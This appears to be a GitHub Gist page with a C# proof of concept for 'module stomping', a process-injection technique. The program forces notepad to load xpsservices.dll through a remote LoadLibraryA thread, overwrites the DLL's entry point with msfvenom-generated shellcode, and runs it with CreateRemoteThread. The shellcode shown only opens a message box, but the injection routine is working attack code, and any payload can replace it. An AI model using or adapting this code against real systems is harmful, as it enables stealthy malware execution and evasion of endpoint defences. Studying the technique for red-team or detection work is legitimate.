Created
          November 17, 2020 15:27 
        
      - 
      
- 
        Save AA-2020743/5fe41a9c57b177b6339631fdac8bf390 to your computer and use it in GitHub Desktop. 
    Barely functional module stomping in C#
  
        
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace ModuleStomp | |
| { | |
| class Program | |
| { | |
| static string ModuleName = @"xpsservices.dll"; | |
| static void Main(string[] args) | |
| { | |
| var process = Process.GetProcessesByName("notepad")[0]; | |
| // Load the desired DLL | |
| var encodedModuleName = Encoding.UTF8.GetBytes(ModuleName); | |
| var mem = Win32.VirtualAllocEx(process.Handle, IntPtr.Zero, (uint)encodedModuleName.Length, 0x1000 | 0x2000, 0x40); | |
| Win32.WriteProcessMemory(process.Handle, mem, encodedModuleName, (uint)encodedModuleName.Length, out UIntPtr _); | |
| var kernel = Win32.LoadLibraryEx("kernel32.dll", IntPtr.Zero, 0); | |
| var loadLibrary = Win32.GetProcAddress(kernel, "LoadLibraryA"); | |
| Win32.CreateRemoteThread(process.Handle, IntPtr.Zero, 0, loadLibrary, mem, 0, IntPtr.Zero); | |
| var ModuleEntry = IntPtr.Zero; | |
| // refresh the process to get the base address of the loaded DLL | |
| process = Process.GetProcessById(process.Id); | |
| foreach (ProcessModule module in process.Modules) | |
| { | |
| if (module.ModuleName.Equals(ModuleName, StringComparison.OrdinalIgnoreCase)) | |
| { | |
| ModuleEntry = module.EntryPointAddress; | |
| break; | |
| } | |
| } | |
| if (ModuleEntry == IntPtr.Zero) | |
| { | |
| Console.WriteLine("Could not find module entry"); | |
| return; | |
| } | |
| // msfvenom -p windows/x64/messagebox EXITFUNC=thread -f csharp | |
| var buf = new byte[323] { | |
| 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51, | |
| 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48, | |
| 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48, | |
| 0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02, | |
| 0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e, | |
| 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88, | |
| 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48, | |
| 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e, | |
| 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41, | |
| 0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24, | |
| 0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, | |
| 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e, | |
| 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41, | |
| 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, | |
| 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1, | |
| 0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d, | |
| 0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff, | |
| 0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48, | |
| 0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13, | |
| 0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f, | |
| 0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73, | |
| 0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 }; | |
| Win32.WriteProcessMemory(process.Handle, ModuleEntry, buf, (uint)buf.Length, out UIntPtr _); | |
| Win32.CreateRemoteThread(process.Handle, IntPtr.Zero, 0, ModuleEntry, IntPtr.Zero, 0, IntPtr.Zero); | |
| } | |
| } | |
| public class Win32 | |
| { | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr VirtualAllocEx( | |
| IntPtr hProcess, | |
| IntPtr lpAddress, | |
| uint dwSize, | |
| uint flAllocationType, | |
| uint flProtect); | |
| [DllImport("kernel32.dll")] | |
| public static extern bool WriteProcessMemory( | |
| IntPtr hProcess, | |
| IntPtr lpBaseAddress, | |
| byte[] lpBuffer, | |
| uint nSize, | |
| out UIntPtr lpNumberOfBytesWritten); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr LoadLibraryEx( | |
| string lpFileName, | |
| IntPtr hReservedNull, | |
| uint dwFlags); | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress( | |
| IntPtr hModule, | |
| string procName); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr CreateRemoteThread( | |
| IntPtr hProcess, | |
| IntPtr lpThreadAttributes, | |
| uint dwStackSize, | |
| IntPtr lpStartAddress, | |
| IntPtr lpParameter, | |
| uint dwCreationFlags, | |
| IntPtr lpThreadId); | |
| } | |
| } | 
  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment